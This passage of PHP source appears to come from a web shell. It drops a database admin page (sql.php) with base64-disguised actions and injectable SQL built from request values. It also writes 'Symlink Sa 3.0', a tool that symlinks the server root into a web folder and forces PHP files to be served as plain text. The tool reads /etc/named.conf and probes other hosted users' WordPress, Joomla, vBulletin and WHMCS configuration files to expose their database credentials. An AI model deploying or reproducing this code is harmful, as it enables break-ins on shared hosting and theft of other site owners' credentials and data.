<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
<td>&nbsp</td>
</tr>
<tr>
<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
<td colspan=5><center>value list</center></td>
</tr>
<tr>
<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
<td colspan=5><center>value list</center></td>
</tr>

</table>
<table>
<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
<tr>
<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" )  ) echo "checked";echo '></td>
<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
</tr>
</table>


<h3>Flags</h3>
<table>
<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
<tr>
<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
</tr>
</table>

<p>';

	if( $cmd == "add" )
		echo "<input type=submit value='Add Field'>\n";
	else if( $cmd == "edit" )
		echo "<input type=submit value='Edit Field'>\n";
	echo "<input type=button value=Cancel onClick='history.back()'>\n";
	echo "</form>\n";
}

function manageField_submit( $cmd ) {
	global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
		$M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;

	if( $cmd == "add" )
		$queryStr = "ALTER TABLE $tablename ADD $name ";
	else if( $cmd == "edit" )
		$queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";

	if( $M != "" )
		if( $D != "" )
			$queryStr .= "$type($M,$D) ";
		else
			$queryStr .= "$type($M) ";
	else if( $valuelist != "" ) {
		$valuelist = stripslashes( $valuelist );
		$queryStr .= "$type($valuelist) ";
	} else
		$queryStr .= "$type ";

	$queryStr .= "$unsigned $zerofill $binary ";

	if( $default_value != "" )
		$queryStr .= "DEFAULT '$default_value' ";

	$queryStr .= "$not_null $auto_increment";

	mysql_select_db( $dbname, $mysqlHandle );
	mysql_query( $queryStr, $mysqlHandle );
	$errMsg = mysql_error();

	// key change
	$keyChange = false;
	$result = mysql_query( "SHOW KEYS FROM $tablename" );
	$primary = "";
	while( $row = mysql_fetch_array($result) )
		if( $row["Key_name"] == "PRIMARY" ) {
			if( $row[Column_name] == $name )
				$keyChange = true;
			else
				$primary .= ", $row[Column_name]";
		}
	if( $primary_key == "PRIMARY KEY" ) {
		$primary .= ", $name";
		$keyChange = !$keyChange;
	}
	$primary = substr( $primary, 2 );
	if( $keyChange == true ) {
		$q = "ALTER TABLE $tablename DROP PRIMARY KEY";
		mysql_query( $q );
		$queryStr .= "<br>\n" . $q;
		$errMsg .= "<br>\n" . mysql_error();
		$q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
		mysql_query( $q );
		$queryStr .= "<br>\n" . $q;
		$errMsg .= "<br>\n" . mysql_error();
	}

	viewSchema();
}

function dropField() {
	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

	$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
	mysql_select_db( $dbname, $mysqlHandle );
	mysql_query( $queryStr , $mysqlHandle );
	$errMsg = mysql_error();

	viewSchema();
}

function viewData( $queryStr ) {
	global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;

	echo "<h1>Data in Table</h1>\n";
	if( $tablename != "" )
		echo "<p class=location>$dbname &gt; $tablename</p>\n";
	else
		echo "<p class=location>$dbname</p>\n";

	$queryStr = stripslashes( $queryStr );
	if( $queryStr == "" ) {
		$queryStr = "SELECT * FROM $tablename";
		if( $orderby != "" )
			$queryStr .= " ORDER BY $orderby";
		echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
		echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
	}

	$pResult = mysql_db_query( $dbname, $queryStr );
	$fieldt = mysql_fetch_field($pResult);
	$tablename = $fieldt->table;
	$errMsg = mysql_error();

	$GLOBALS[queryStr] = $queryStr;

	if( $pResult == false ) {
		echoQueryResult();
		return;
	}
	if( $pResult == 1 ) {
		$errMsg = "Success";
		echoQueryResult();
		return;
	}

	echo "<hr>\n";

	$row = mysql_num_rows( $pResult );
	$col = mysql_num_fields( $pResult );

	if( $row == 0 ) {
		echo "No Data Exist!";
		return;
	}

	if( $rowperpage == "" ) $rowperpage = 30;
	if( $page == "" ) $page = 0;
	else $page--;
	mysql_data_seek( $pResult, $page * $rowperpage );

	echo "<table cellspacing=1 cellpadding=2>\n";
	echo "<tr>\n";
	for( $i = 0; $i < $col; $i++ ) {
		$field = mysql_fetch_field( $pResult, $i );
		echo "<th>";
		if($action == "dmlld0RhdGE=")
			echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
		else
			echo $field->name."\n";
		echo "</th>\n";
	}
	echo "<th colspan=2>Action</th>\n";
	echo "</tr>\n";

	for( $i = 0; $i < $rowperpage; $i++ ) {
		$rowArray = mysql_fetch_row( $pResult );
		if( $rowArray == false ) break;
		echo "<tr>\n";
		$key = "";
		for( $j = 0; $j < $col; $j++ ) {
			$data = $rowArray[$j];

			$field = mysql_fetch_field( $pResult, $j );
			if( $field->primary_key == 1 )
				$key .= "&" . $field->name . "=" . $data;

			if( strlen( $data ) > 30 )
				$data = substr( $data, 0, 30 ) . "...";
			$data = htmlspecialchars( $data );
			echo "<td>\n";
			echo "$data\n";
			echo "</td>\n";
		}

		if( $key == "" )
			echo "<td colspan=2>no Key</td>\n";
		else {
			echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
			echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
		}
		echo "</tr>\n";
	}
	echo "</table>\n";

	echo "<font size=2>\n";
	if($action == "dmlld0RhdGE=")
		echo "<form action='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename' method=post>\n";
	else
		echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";

	echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
	echo "</font>\n";
	echo " | ";
	if( $page > 0 ) {
		if($action == "dmlld0RhdGE=")
			echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page);
		else
			echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
		if( $orderby != "" && $action == "dmlld0RhdGE=")
			echo "&orderby=$orderby";
		echo "'>Prev</a>\n";
	} else
		echo "Prev";
	echo " | ";
	if( $page < ($row/$rowperpage)-1 ) {
		if($action == "dmlld0RhdGE=")
			echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page+2);
		else
			echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
		if( $orderby != "" && $action == "dmlld0RhdGE=")
			echo "&orderby=$orderby";
		echo "'>Next</a>\n";
	} else
		echo "Next";
	echo " | ";
	if( $row > $rowperpage ) {
		echo "<input type=text size=4 name=page>\n";
		echo "<input type=submit value='Go'>\n";
	}
	echo "</form>\n";
	echo "</font>\n";
}

function manageData( $cmd ) {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF;

	if( $cmd == "add" )
		echo "<h1>Add Data</h1>\n";
	else if( $cmd == "edit" ) {
		echo "<h1>Edit Data</h1>\n";
		$pResult = mysql_list_fields( $dbname, $tablename );
		$num = mysql_num_fields( $pResult );

		$key = "";
		for( $i = 0; $i < $num; $i++ ) {
			$field = mysql_fetch_field( $pResult, $i );
			if( $field->primary_key == 1 )
				if( $field->numeric == 1 )
					$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
				else
					$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
		}
		$key = substr( $key, 0, strlen($key)-4 );

		mysql_select_db( $dbname, $mysqlHandle );
		$pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
		$data = mysql_fetch_array( $pResult );
	}

	echo "<p class=location>$dbname &gt; $tablename</p>\n";

	echo "<form action='$PHP_SELF' method=post>\n";
	if( $cmd == "add" )
		echo "<input type=hidden name=action value=addData_submit>\n";
	else if( $cmd == "edit" )
		echo "<input type=hidden name=action value=editData_submit>\n";
	echo "<input type=hidden name=dbname value=$dbname>\n";
	echo "<input type=hidden name=tablename value=$tablename>\n";
	echo "<table cellspacing=1 cellpadding=2>\n";
	echo "<tr>\n";
	echo "<th>Name</th>\n";
	echo "<th>Type</th>\n";
	echo "<th>Function</th>\n";
	echo "<th>Data</th>\n";
	echo "</tr>\n";

	$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
	$num = mysql_num_rows( $pResult );

	$pResultLen = mysql_list_fields( $dbname, $tablename );

	for( $i = 0; $i < $num; $i++ ) {
		$field = mysql_fetch_array( $pResult );
		$fieldname = $field["Field"];
		$fieldtype = $field["Type"];
		$len = mysql_field_len( $pResultLen, $i );

		echo "<tr>";
		echo "<td>$fieldname</td>";
		echo "<td>".$field["Type"]."</td>";
		echo "<td>\n";
		echo "<select name=${fieldname}_function>\n";
		echo "<option>\n";
		echo "<option>ASCII\n";
		echo "<option>CHAR\n";
		echo "<option>SOUNDEX\n";
		echo "<option>CURDATE\n";
		echo "<option>CURTIME\n";
		echo "<option>FROM_DAYS\n";
		echo "<option>FROM_UNIXTIME\n";
		echo "<option>NOW\n";
		echo "<option>PASSWORD\n";
		echo "<option>PERIOD_ADD\n";
		echo "<option>PERIOD_DIFF\n";
		echo "<option>TO_DAYS\n";
		echo "<option>USER\n";
		echo "<option>WEEKDAY\n";
		echo "<option>RAND\n";
		echo "</select>\n";
		echo "</td>\n";
		$value = htmlspecialchars($data[$i]);
		if( $cmd == "add" ) {
			$type = strtok( $fieldtype, " (,)\n" );
			if( $type == "enum" || $type == "set" ) {
				echo "<td>\n";
				if( $type == "enum" )
					echo "<select name=$fieldname>\n";
				else if( $type == "set" )
					echo "<select name=$fieldname size=4 multiple>\n";
				while( $str = strtok( "'" ) ) {
					echo "<option>$str\n";
					strtok( "'" );
				}
				echo "</select>\n";
				echo "</td>\n";
			} else {
				if( $len < 40 )
					echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
				else
					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
			}
		} else if( $cmd == "edit" ) {
			$type = strtok( $fieldtype, " (,)\n" );
			if( $type == "enum" || $type == "set" ) {
				echo "<td>\n";
				if( $type == "enum" )
					echo "<select name=$fieldname>\n";
				else if( $type == "set" )
					echo "<select name=$fieldname size=4 multiple>\n";
				while( $str = strtok( "'" ) ) {
					if( $value == $str )
						echo "<option selected>$str\n";
					else
						echo "<option>$str\n";
					strtok( "'" );
				}
				echo "</select>\n";
				echo "</td>\n";
			} else {
				if( $len < 40 )
					echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
				else
					echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
			}
		}
		echo "</tr>";
	}
	echo "</table><p>\n";
	if( $cmd == "add" )
		echo "<input type=submit value='Add Data'>\n";
	else if( $cmd == "edit" )
		echo "<input type=submit value='Edit Data'>\n";
	echo "<input type=button value='Cancel' onClick='history.back()'>\n";
	echo "</form>\n";
}

function manageData_submit( $cmd ) {
	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

	$pResult = mysql_list_fields( $dbname, $tablename );
	$num = mysql_num_fields( $pResult );

	mysql_select_db( $dbname, $mysqlHandle );
	if( $cmd == "add" )
		$queryStr = "INSERT INTO $tablename VALUES (";
	else if( $cmd == "edit" )
		$queryStr = "REPLACE INTO $tablename VALUES (";
	for( $i = 0; $i < $num-1; $i++ ) {
		$field = mysql_fetch_field( $pResult );
		$func = $GLOBALS[$field->name."_function"];
		if( $func != "" )
			$queryStr .= " $func(";
		if( $field->numeric == 1 ) {
			$queryStr .= $GLOBALS[$field->name];
			if( $func != "" )
				$queryStr .= "),";
			else
				$queryStr .= ",";
		} else {
			$queryStr .= "'" . $GLOBALS[$field->name];
			if( $func != "" )
				$queryStr .= "'),";
			else
				$queryStr .= "',";
		}
	}
	$field = mysql_fetch_field( $pResult );
	if( $field->numeric == 1 )
		$queryStr .= $GLOBALS[$field->name] . ")";
	else
		$queryStr .= "'" . $GLOBALS[$field->name] . "')";

	mysql_query( $queryStr , $mysqlHandle );
	$errMsg = mysql_error();

	viewData( "" );
}

function deleteData() {
	global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

	$pResult = mysql_list_fields( $dbname, $tablename );
	$num = mysql_num_fields( $pResult );

	$key = "";
	for( $i = 0; $i < $num; $i++ ) {
		$field = mysql_fetch_field( $pResult, $i );
		if( $field->primary_key == 1 )
			if( $field->numeric == 1 )
				$key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
			else
				$key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
	}
	$key = substr( $key, 0, strlen($key)-4 );

	mysql_select_db( $dbname, $mysqlHandle );
	$queryStr =  "DELETE FROM $tablename WHERE $key";
	mysql_query( $queryStr, $mysqlHandle );
	$errMsg = mysql_error();

	viewData( "" );
}

function fetch_table_dump_sql($table)
{
	global $mysqlHandle,$dbname;

	mysql_select_db( $dbname, $mysqlHandle );
	$query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
	$tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
	$tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";

	echo $tabledump;

	// get data
	$rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
	$numfields=mysql_num_fields($rows);
	while ($row = mysql_fetch_array($rows, MYSQL_NUM))
	{
		$tabledump = "INSERT INTO $table VALUES(";

		$fieldcounter = -1;
		$firstfield = 1;
		// get each field's data
		while (++$fieldcounter < $numfields)
		{
			if (!$firstfield)
			{
				$tabledump .= ', ';
			}
			else
			{
				$firstfield = 0;
			}

			if (!isset($row["$fieldcounter"]))
			{
				$tabledump .= 'NULL';
			}
			else
			{
				$tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
			}
		}

		$tabledump .= ");\n";

		echo $tabledump;

	}
	@mysql_free_result($rows);
}

function dump() {
	global $mysqlHandle, $action, $dbname, $tablename;

	if( $action == "dumpTable" ){

		header("Content-disposition: filename=$tablename.sql");
		header('Content-type: unknown/unknown');
		fetch_table_dump_sql($tablename);
		echo "\n\n\n";
		echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
		exit;

	}else{
		header("Content-disposition: filename=$dbname.sql");
		header('Content-type: unknown/unknown');

		mysql_select_db( $dbname, $mysqlHandle );
		$query_id = mysql_query("SHOW tables",$mysqlHandle);
		while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
		{
				fetch_table_dump_sql($row[0]);
				echo "\n\n\n";
				echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
				echo "\n\n\n";
		}
		echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
		exit;

	}

}

function utils() {
	global $PHP_SELF, $command;
	echo "<h1>Utilities</h1>\n";
	if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
		echo "<hr>\n";
		echo "Show\n";
		echo "<ul>\n";
		echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
		echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
		echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
		echo "</ul>\n";
		echo "Flush\n";
		echo "<ul>\n";
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
		if( $command == "flush_hosts" ) {
			if( mysql_query( "Flush hosts" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
		if( $command == "flush_logs" ) {
			if( mysql_query( "Flush logs" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
		if( $command == "flush_privileges" ) {
			if( mysql_query( "Flush privileges" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
		if( $command == "flush_tables" ) {
			if( mysql_query( "Flush tables" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
		if( $command == "flush_status" ) {
			if( mysql_query( "Flush status" ) != false )
				echo "- Success";
			else
				echo "- Fail";
		}
		echo "</ul>\n";
	} else {
		$queryStr = ereg_replace( "_", " ", $command );
		$pResult = mysql_query( $queryStr );
		if( $pResult == false ) {
			echo "Fail";
			return;
		}
		$col = mysql_num_fields( $pResult );

		echo "<p class=location>$queryStr</p>\n";
		echo "<hr>\n";

		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
		echo "<tr>\n";
		for( $i = 0; $i < $col; $i++ ) {
			$field = mysql_fetch_field( $pResult, $i );
			echo "<th>".$field->name."</th>\n";
		}
		echo "</tr>\n";

		while( 1 ) {
			$rowArray = mysql_fetch_row( $pResult );
			if( $rowArray == false ) break;
			echo "<tr>\n";
			for( $j = 0; $j < $col; $j++ )
				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
			echo "</tr>\n";
		}
		echo "</table>\n";
	}
}



function footer_html() {
	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;

	echo "<hr>\n";
	echo "[$USERNAME] - \n";

	echo "<a href='$PHP_SELF?action=bGlzdERCcw=='>Database List</a> | \n";
	if( $tablename != "" )
		echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";


}




//------------- MAIN ------------- //
error_reporting(0);
ini_set ('display_errors', 0);
ini_set ('log_errors', 0);

if( $action == "logon" || $action == "" || $action == "logout" )
	logon();
else if( $action == "bG9nb25fc3VibWl0" )
	logon_submit();
else if( $action == "dumpTable" || $action == "dumpDB" ) {
	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
		if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
	}
	$mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
	dump();
} else {
	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
		if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
	}
	echo "<!--";
	$mysqlHandle = @mysql_connect( $HOSTNAME.":3306", $USERNAME, $PASSWORD );
	echo "-->";

	if( $mysqlHandle == false ) {


		echo "<table width=100% height=100%><tr><td><center>\n";
		echo "<h1>Wrong Password!</h1>\n";
		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
		echo "</center></td></tr></table>\n";

	} else {

		if( $action == "bGlzdERCcw==" )
			listDatabases();
		else if( $action == "createDB" )
			createDatabase();
		else if( $action == "dropDB" )
			dropDatabase();
		else if( $action == "listTables" )
			listTables();
		else if( $action == "createTable" )
			createTable();
		else if( $action == "dropTable" )
			dropTable();
		else if( $action == "viewSchema" )
			viewSchema();
		else if( $action == "query" )
			viewData( $queryStr );
		else if( $action == "addField" )
			manageField( "add" );
		else if( $action == "addField_submit" )
			manageField_submit( "add" );
		else if( $action == "editField" )
			manageField( "edit" );
		else if( $action == "editField_submit" )
			manageField_submit( "edit" );
		else if( $action == "dropField" )
			dropField();
		else if( $action == "dmlld0RhdGE=" )
			viewData( "" );
		else if( $action == "addData" )
			manageData( "add" );
		else if( $action == "addData_submit" )
			manageData_submit( "add" );
		else if( $action == "editData" )
			manageData( "edit" );
		else if( $action == "editData_submit" )
			manageData_submit( "edit" );
		else if( $action == "deleteData" )
			deleteData();
		else if( $action == "utils" )
			utils();

		mysql_close( $mysqlHandle);
		footer_html();
	}
}


?>
<html>
<head>
<title>MySQL Interface (Developed By Mohajer22)</title>
<body bgColor=#202040 >
<style type="text/css">
<!--
p.location {
	color: #11bb33;
	font-size: small;
}
h1 {
	color: #c00000;
}
th {
	background-color: #000000;
	color: #11bb33;
	font-size: small;
}
td {
	background-color: #808080;
	font-size: small;
}
form {
	margin-top: 0;
	margin-bottom: 0;
}
a {
	text-decoration:none;
	color: #848200;
	font-size:small;
}
A:link {
COLOR:#EEEFD5;
TEXT-DECORATION: none
}
A:visited {
COLOR:#c00000;
TEXT-DECORATION: none
}
A:active {
COLOR:#c00000;
TEXT-DECORATION: none
}
A:hover {
color:#c00000;
TEXT-DECORATION: none
}
input, select, textarea {
background-color: #404040;
border-style: solid;
font-family: verdana, arial, sans-serif;
font-size:small;
color: #000000;
padding: 0px;
}
//-->
</style>
</head>';$file = fopen("sql.php" ,"w+");$write = fwrite ($file ,base64_decode($crackftp));fclose($file);echo " ";}elseif ($action == 'sym1') {@chdir('damane');$symlinker = '<?php

set_time_limit(0);
error_reporting(0);


$pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$u = explode("/",$pageURL );
$pageURL =str_replace($u[count($u)-1],"",$pageURL );

$pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
$u = explode("/",$pageFTP );
$pageFTP =str_replace($u[count($u)-1],"",$pageFTP );

?>
  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Symlink_Sa 3.0</title>

<style type="text/css">

  html,body {
     margin: 0;
     padding: 0;
     outline: 0;
}
a{

 font-size: 13px;

}


body {
    direction: ltr;
    background-color:#F4F4F4;
	color: rgb(153, 153, 153);
    text-align: center
}



input,textarea,select{
font-weight: bold;
color: #000000;
}

input,textarea,select:hover{
box-shadow: 0px 0px 4px #AAAAAA;
}


.hedr {
  font-family: Tahoma, Arial, sans-serif  ;
  font-size: 22px;


}

.cont a{

 text-decoration: none;
 color:rgb(153, 153, 153);
 font-family: Tahoma, Arial, sans-serif  ;
 font-size: 16px;
 text-shadow: 0px 0px 3px ;
}

.cont a:hover{


  color: #EEEEEE ;
  text-shadow:0px 0px 3px #000000 ;


}

.tmp tr td{

border: solid 1px #BBBBBB;

padding: 2px ;
  font-size: 13px;
}

.tmp tr td a {
  text-decoration: none;



}

.foter{
  font-size: 9pt;
  color: #AAAAAA ;
  text-align: center
}

.tmp tr td:hover{

box-shadow: 0px 0px 4px #888888;

}
.fot{

font-family:Tahoma, Arial, sans-serif;

  font-size: 11pt;
}
.for a : hover{

text-shadow: 0px 0px 1px #3366FF;

}


.ir {
  color: #FF0000;
}



</style>

</head>

<body>

<div class='all'>


<?php

@mkdir('sym',0777);
$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$f =@fopen ('sym/.htaccess','w');
fwrite($f , $htcs);



@symlink("/","sym/root");

$pg = basename(__FILE__);

echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;

echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;

echo '<div class="cont">

[<a href="?"> Home </a>]

[<a href="?sws=sym"> User & Domains & Symlink </a>]

[<a href="?sws=sec"> Domains & Script </a>]

[ <a href="?sws=file"> Symlink File </a>]

[<a href="?sws=passwd"> Symlink Bypass </a>]

<br /><br />

[ <a href="?sws=read"> Bypass Read </a>]

[ <a href="?sws=joomla"> Mass Joomla </a>]

[ <a href="?sws=wp"> Mass WordPress </a>]

[ <a href="?sws=vb"> Mass vBulletin </a>]

[ <a href="?sws=help"> Help </a>]

<br /><br /><br />






</div>';

if(isset($_REQUEST['sws']))
{

switch ($_REQUEST['sws'])
{

/// Domains + Scripts  ///

case 'sec':

if(!@is_file('named.txt')){

$d00m = @file("/etc/named.conf");

}else{

$d00m = @file("named.txt");


}
if(!$d00m)
{

                die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
}
else

{
echo "<div class='tmp'>
<table align='center' width='40%'><td> Domains </td><td> Script </td>";
foreach($d00m as $dom){

flush();
flush();



if(eregi("zone",$dom)){

@preg_match_all('#zone "(.*)"#', $dom, $domsws);

flush();

if(@strlen(trim($domsws[1][0])) > 2){

$user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));

///////////////////////////////////////////////////////////////////////////////////

$wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
$wpp=@get_headers($wpl);
$wp=$wpp[0];

$wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
$wpp2=@get_headers($wp2);
$wp12=$wpp2[0];

///////////////////////////////

$jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
$joo=@get_headers($jo1);
$jo=$joo[0];


$jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
$joo2=@get_headers($jo2);
$jo12=$joo2[0];

////////////////////////////////

$vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
$vbb=@get_headers($vb1);
$vb=$vbb[0];

$vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
$vbb2=@get_headers($vb2);
$vb12=$vbb2[0];

$vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
$vbb3=@get_headers($vb3);
$vb13=$vbb3[0];

/////////////////

$wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
$whh2= @get_headers($wh1);
$wh=$whh2[0];

$wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
$whh2= @get_headers($wh2);
$wh12=$whh2[0];

$wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh3= @get_headers($wh3);
$wh13=$whh3[0];

$wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
$whh5= @get_headers($wh5);
$wh15=$whh5[0];

$wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
$whh4= @get_headers($wh4);
$wh14=$whh4[0];



////////////////////////////////////////////////////////////////////////////////

 ////////// Wordpress ////////////

$pos = strpos($wp, "200");
$config="&nbsp;";

if (strpos($wp, "200") == true )
{
 $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
}
elseif (strpos($wp12, "200") == true)
{
  $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
}

///////////WHMCS////////

elseif (strpos($jo, "200")  == true and strpos($wh15, "200")  == true )
{
  $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";

}
elseif (strpos($wh12, "200")  == true)
{
